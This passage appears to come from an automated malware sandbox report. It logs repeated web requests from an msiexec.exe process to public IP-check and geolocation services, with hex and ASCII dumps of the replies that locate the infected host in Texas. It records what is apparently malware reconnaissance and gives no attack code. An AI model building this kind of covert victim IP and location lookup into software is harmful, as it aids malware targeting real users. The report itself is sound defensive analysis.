                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.549834193.122.6.168801128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 4, 2024 07:13:44.146894932 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Nov 4, 2024 07:13:44.988532066 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:44 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 1895bb71d7db0528553964d8322fd88f
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.549846193.122.6.168801128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 4, 2024 07:13:45.963639021 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Nov 4, 2024 07:13:46.798877001 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:46 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 53291c1bd387504afcd737fa0c70b98f
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.549858193.122.6.168801128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 4, 2024 07:13:47.565109015 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Nov 4, 2024 07:13:48.409867048 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:48 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 0d1d5ed33ccdc9a94b59777ddf5a2ea4
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.549870193.122.6.168801128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 4, 2024 07:13:49.164886951 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Nov 4, 2024 07:13:50.006325960 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:49 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: beaeeebce6018a09f641f6f24662f66c
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.549882193.122.6.168801128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 4, 2024 07:13:50.779438019 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Nov 4, 2024 07:13:51.623099089 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 203e1325b1a8933a5820aeb5ccb9cbd5
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.549889193.122.6.168801128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 4, 2024 07:13:52.384509087 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Nov 4, 2024 07:13:53.210242987 CET323INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:53 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 10562da5c1afa4c4e5bdd898bf0c5306
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.549811188.114.96.34431128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-04 06:13:41 UTC87OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-11-04 06:13:41 UTC1222INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:41 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7179
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vV3JQxMrGjUyNNUJpblfswyrpPM0%2Fqcctgv%2FNrio6U7llML6SkLqzzWeyY5tbWNkXv32uPnJW4Mc%2F3iz8zEtsqoBK%2FI4%2BRq3kNTR%2FuvvwY6RgxgwACuHuH2o48ftpbGyTTqQ2dCC"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275a55f8d2e71-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1746682&cwnd=251&unsent_bytes=0&cid=547bc60fb753c0bf&ts=194&x=0"
                                                                            2024-11-04 06:13:41 UTC147INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e
                                                                            Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
                                                                            2024-11-04 06:13:41 UTC212INData Raw: 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                            Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.549819188.114.96.34431128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-04 06:13:42 UTC63OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-11-04 06:13:42 UTC1221INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:42 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7180
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKTpMT1aZmIgQ9fpe%2FsZrHLAhxnCd%2FTCQtxFEgIU0RWK4iXMlZKkPGKgHssNbbWKZzsNHhy5aK9hbsOOV%2FMJo4%2F26ttJniViMtaN5Bx%2Fz%2B5IXEoEz1RP2VXv1CafV3cYf9YwANyY"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275ac5a4445e8-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=997&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2881592&cwnd=251&unsent_bytes=0&cid=92d7ed0e722d0a1f&ts=143&x=0"
                                                                            2024-11-04 06:13:42 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
                                                                            Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                                            2024-11-04 06:13:42 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                            Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.549829188.114.96.34431128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-04 06:13:43 UTC63OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-11-04 06:13:44 UTC1212INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:44 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7182
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=37Q4BDKmwhkqfGTOBMqcujUvcIHAQ4JlWfremYyRcufBxEr64iOyOeU3OY8wpa00Y11MS4qXKLYuVsG7puOGRnaWGDoZ98iCH20XjrqKDm%2FU0uUFwTGcyjXxnSLZNNcEo5A3M7xJ"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275b6580d2e17-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2007&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1473791&cwnd=245&unsent_bytes=0&cid=afc51aeee00058d1&ts=156&x=0"
                                                                            2024-11-04 06:13:44 UTC157INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c
                                                                            Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas<
                                                                            2024-11-04 06:13:44 UTC202INData Raw: 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                            Data Ascii: /RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.549840188.114.96.34431128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-04 06:13:45 UTC87OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-11-04 06:13:45 UTC1227INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:45 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7183
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cyWuZCMc5nv7yzcDw7YRCQ975gZoK%2BC3l1ROk%2BbOY%2FPGjjtXwB34%2FJgl7zP2G1zYsenBgvp9dF4hFr%2BisSfFXlBGHFNP%2F8Hz%2BTlF%2F%2Ff44o3cEw7HwM8oVAKSgvfG27HJRX2NEKyQ"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275c1cc296b3f-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=996&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2630336&cwnd=245&unsent_bytes=0&cid=cab88c2ad9bf44b0&ts=359&x=0"
                                                                            2024-11-04 06:13:45 UTC142INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65
                                                                            Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Re
                                                                            2024-11-04 06:13:45 UTC217INData Raw: 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                            Data Ascii: gionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.549852188.114.96.34431128C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-04 06:13:47 UTC87OUTGET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-11-04 06:13:47 UTC1218INHTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:47 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7185
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2PN0m39uWF9h%2Fz6SBiDvy%2BI6xvJXSjiMvsB15WJMJVoq3ouzKXa9ybm4eKqjACSrUCbVjkcU6HaOpvpwcKN4wuGEaLAo6ftqK%2BwxM4C6zsgmo8aAkudaH%2FD1pFvnj6uXI8mEjgi"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275cbc9d44769-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1224&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2264268&cwnd=249&unsent_bytes=0&cid=a3266824c9f83f2a&ts=146&x=0"
